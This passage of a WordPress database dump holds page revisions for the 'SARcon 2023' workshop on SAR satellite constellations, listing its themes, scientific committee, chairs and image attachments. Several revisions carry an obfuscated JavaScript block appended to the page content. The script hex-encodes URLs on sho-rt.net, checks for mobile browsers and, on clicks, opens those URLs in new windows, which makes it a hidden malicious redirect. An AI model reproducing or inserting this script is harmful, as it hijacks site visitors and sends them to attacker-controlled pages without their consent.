)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:44:03','2022-10-13 16:44:03','',2736,'https://gsw2023.com/?p=2742',0,'revision','',0),
(2743,1,'2022-10-13 16:44:39','2022-10-13 16:44:39','','Untitled-1','','inherit','open','closed','','untitled-1-2','','','2022-10-13 16:44:39','2022-10-13 16:44:39','',2736,'https://gsw2023.com/wp-content/uploads/2022/10/Untitled-1-1.jpg',0,'attachment','image/jpeg',0),
(2744,1,'2022-10-13 16:45:37','2022-10-13 16:45:37','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SARcon 2023 - SAR constellations and applications','','inherit','closed','closed','','2736-revision-v1','','','2022-10-13 16:45:37','2022-10-13 16:45:37','',2736,'https://gsw2023.com/?p=2744',0,'revision','',0),
(2745,1,'2022-10-13 16:57:53','2022-10-13 16:57:53','','Timo Balz<br>Wuhan University, China<br>(WG I/5)','','publish','closed','closed','','timo-balzwuhan-university-chinawg-i-5','','','2022-11-09 23:02:29','2022-11-09 23:02:29','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2745',0,'dt_team','',0),
(2746,1,'2022-10-13 16:57:40','2022-10-13 16:57:40','','w111','','inherit','open','closed','','w111','','','2022-10-13 16:57:40','2022-10-13 16:57:40','',2745,'https://gsw2023.com/wp-content/uploads/2022/10/w111.jpg',0,'attachment','image/jpeg',0),
(2747,1,'2022-10-13 16:59:02','2022-10-13 16:59:02','','Junichi Susaki<br>Kyoto University, Japan<br>(WG III/3)','','publish','closed','closed','','junichi-susakikyoto-university-japanwg-iii-3','','','2022-11-09 23:04:16','2022-11-09 23:04:16','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2747',0,'dt_team','',0),
(2748,1,'2022-10-13 16:58:54','2022-10-13 16:58:54','','w112','','inherit','open','closed','','w112','','','2022-11-09 23:03:52','2022-11-09 23:03:52','',2747,'https://gsw2023.com/wp-content/uploads/2022/10/w112.jpg',0,'attachment','image/jpeg',0),
(2749,1,'2022-10-13 17:00:16','2022-10-13 17:00:16','','Xinming Tang<br>Land Satellite Remote Sensing Application Center (LASAC), Ministry of Natural Resources of China<br>(TCI)','','publish','closed','closed','','xinming-tangland-satellite-remote-sensing-application-center-lasac-ministry-of-natural-resources-of-chinatci','','','2022-11-09 23:02:04','2022-11-09 23:02:04','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2749',0,'dt_team','',0),
(2750,1,'2022-10-13 17:00:05','2022-10-13 17:00:05','','w113','','inherit','open','closed','','w113','','','2022-10-13 17:00:05','2022-10-13 17:00:05','',2749,'https://gsw2023.com/wp-content/uploads/2022/10/w113.jpg',0,'attachment','image/jpeg',0),
(2751,1,'2022-10-13 17:02:07','2022-10-13 17:02:07','','Yu Wang<br>National Key Laboratory on Microwave Imaging Technology, AIRCAS, China','','publish','closed','closed','','yu-wangnational-key-laboratory-on-microwave-imaging-technology-aircas-china','','','2022-10-13 18:53:22','2022-10-13 18:53:22','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2751',0,'dt_team','',0),
(2752,1,'2022-10-13 17:01:37','2022-10-13 17:01:37','','w114','','inherit','open','closed','','w114','','','2022-10-13 17:01:37','2022-10-13 17:01:37','',2751,'https://gsw2023.com/wp-content/uploads/2022/10/w114.jpg',0,'attachment','image/jpeg',0),
(2753,1,'2022-10-13 17:06:57','2022-10-13 17:06:57','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2743\" img_size=\"1200*600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Spaceborne synthetic aperture radar satellites are nowadays often developed in constellations of two or more satellites providing faster revisit times. Other innovative constellation and SAR concepts include geosynchronous SAR systems and non-sun-synchronous orbits for special applications. In this context, SARcon aims to provide a unique forum for professionals involved in spaceborne synthetic aperture system design and application development to share research ideas, present latest achievements, foster cooperation, and encourage international collaboration. The workshop will have two days of technical program, including plenary sessions and invited papers. Contributions will be invited from researchers and participant from ISPRS society in general, including topics on SAR satellite system design, applications in interferometry and tomography, bi- and multi-static SAR and present and upcoming SAR constellations.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][dt_team_masonry][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><strong>Themes of event:</strong></h5>\n<h6 style=\"text-align: justify; color: black;\"><strong>⦁ Discussion on new SAR satellite constellations for bi-static and mono-static pursuit pairs</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Non-sun-synchronous orbits for new applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Geosynchronous SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Innovative applications of SAR and of data from SAR constellations</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ DEM/DSM and global DEM generation techniques and applications</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ Surface motion estimation from SAR</strong></h6>\n<h6 style=\"text-align: justify; color: black;\">\n<strong>⦁ SAR for surveillance and security related applications</strong></h6>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong>Scientific Committee:</strong></h5>\n<h6>\n<strong>⦁ Prof. Florence Tupin, France</strong></h6>\n<h6>\n<strong>⦁ Prof. Jianya Gong, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Michael Schmitt, Germany</strong></h6>\n<h6>\n<strong>⦁ Prof. Chibiao Ding, China</strong></h6>\n<h6>\n<strong>⦁ Prof. Yunkai Deng, China</strong></h6>\n<h6>\n<strong>⦁ Assoc. Prof. Dr. Nusret Demir, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Rafael Rosa, Brazil</strong></h6>\n<h6>\n<strong>⦁ Dr. Füsun Balik Sanli, Turkey</strong></h6>\n<h6>\n<strong>⦁ Dr. Bahaa Mohamadi, Egypt</strong></h6>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 